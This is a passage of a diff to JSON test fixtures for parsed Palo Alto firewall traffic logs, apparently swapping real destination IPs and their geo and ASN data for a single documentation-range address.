- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381872100Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event", 
@@ -6550,27 +6557,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 0,
- "ip": "204.232.231.46",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": {
@@ -6589,7 +6595,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -6623,7 +6629,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=",
+ "community_id": "1:H2dYyEhLqvaoBzgcR4r/ZZbNhd0=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4", 
@@ -6661,14 +6667,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284114480Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381877500Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -6691,24 +6697,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 0,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": { 
@@ -6727,7 +6735,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -6761,7 +6769,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:BKNHj3e0QZpWJwLNiG4yqJnbrxk=",
+ "community_id": "1:Np5F1DWIEE3wK6sFzX70T4DJpZ8=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4",
@@ -6799,14 +6807,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284119132Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381882800Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event", 
@@ -6829,24 +6837,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 316,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 2
 },
 "rule": {
@@ -6865,7 +6875,7 @@
 },
 "packets": 2
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -6899,7 +6909,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:RQ3lmwvSayYq24fFbjpDDqDG+Dg=",
+ "community_id": "1:NOOR09ywg6eb7+6pti9Pn/rRnjU=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4", 
@@ -6937,14 +6947,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 1000000000,
- "ingested": "2021-09-08T12:38:09.284123814Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2",
+ "ingested": "2021-12-09T13:43:22.381886700Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -6967,24 +6977,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 121,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": { 
@@ -7003,7 +7015,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7037,7 +7049,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:g5ixoTtR3QVz4le7g1L6PZ67CmU=",
+ "community_id": "1:4e3Ijfb0Ykh/X94M8iPcJ/4x+Hs=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4",
@@ -7075,14 +7087,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284128833Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
+ "ingested": "2021-12-09T13:43:22.381891200Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event", 
@@ -7105,24 +7117,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 169,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -7141,7 +7155,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7175,7 +7189,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:z0genl/l2JGIJaNTqaSLGCLTlo4=",
+ "community_id": "1:7kYPEtIXJPdKxeRfBwZbUnCqPL8=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4", 
@@ -7213,14 +7227,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284133439Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
+ "ingested": "2021-12-09T13:43:22.381896600Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7243,24 +7257,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "Europe",
- "country_name": "Italy",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "Italy",
+ "region_name": "Jilin",
 "location": {
- "lon": 12.1097,
- "lat": 43.1479
- },
- "country_iso_code": "IT"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 3269,
+ "number": 4837,
 "organization": {
- "name": "Telecom Italia"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 954,
- "ip": "62.211.68.12",
+ "ip": "175.16.199.1",
 "packets": 7
 },
 "rule": { 
@@ -7279,7 +7295,7 @@
 },
 "packets": 6
 },
- "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7313,7 +7329,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:cIfWskY1iVpg8gxVVTX1K8A7+MA=",
+ "community_id": "1:n043Ys2XoO8bLJn3K+Zo1644RIQ=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4", 
@@ -7351,14 +7367,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "62.211.68.12",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284138047Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7",
+ "ingested": "2021-12-09T13:43:22.381900600Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7381,27 +7397,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "IT-MI",
- "city_name": "Assago",
- "country_iso_code": "IT",
- "country_name": "Italy",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "Italy",
- "region_name": "Milan",
+ "region_name": "Jilin",
 "location": {
- "lon": 9.1225,
- "lat": 45.4087
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 8660,
+ "number": 4837,
 "organization": {
- "name": "Italiaonline S.p.A."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 9130,
- "ip": "212.48.10.58",
+ "ip": "175.16.199.1",
 "packets": 10
 },
 "rule": { 
@@ -7420,7 +7435,7 @@
 },
 "packets": 12
 },
- "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7454,7 +7469,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:UPWyVvocuULCMUmJlrn6XBha7JE=",
+ "community_id": "1:0qidnnbIN4o+tL4aZCeOAxWOD7o=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4", 
@@ -7492,14 +7507,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "212.48.10.58",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 2000000000,
- "ingested": "2021-09-08T12:38:09.284142660Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10",
+ "ingested": "2021-12-09T13:43:22.381904700Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7522,27 +7537,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 555,
- "ip": "204.232.231.46",
+ "ip": "175.16.199.1",
 "packets": 3
 },
 "rule": { 
@@ -7561,7 +7575,7 @@
 },
 "packets": 18
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7595,7 +7609,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:jFqkUdvAr9S/yeKacw5dlE+0/o0=",
+ "community_id": "1:c1StQWp9/T6AVKmJDQmxiODGdOM=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4", 
@@ -7633,14 +7647,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 512000000000,
- "ingested": "2021-09-08T12:38:09.284151982Z",
- "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
+ "ingested": "2021-12-09T13:43:22.381909600Z",
+ "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
 "created": "2012-10-30T09:46:27.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7663,24 +7677,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 0,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": { 
@@ -7699,7 +7715,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -7733,7 +7749,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:dQTHsEW3omlFoTmdZu1fchcTb9c=",
+ "community_id": "1:T6PuZUG1ujd3dGCgk/0pJ3g5ElA=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4",
@@ -7771,14 +7787,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284157925Z",
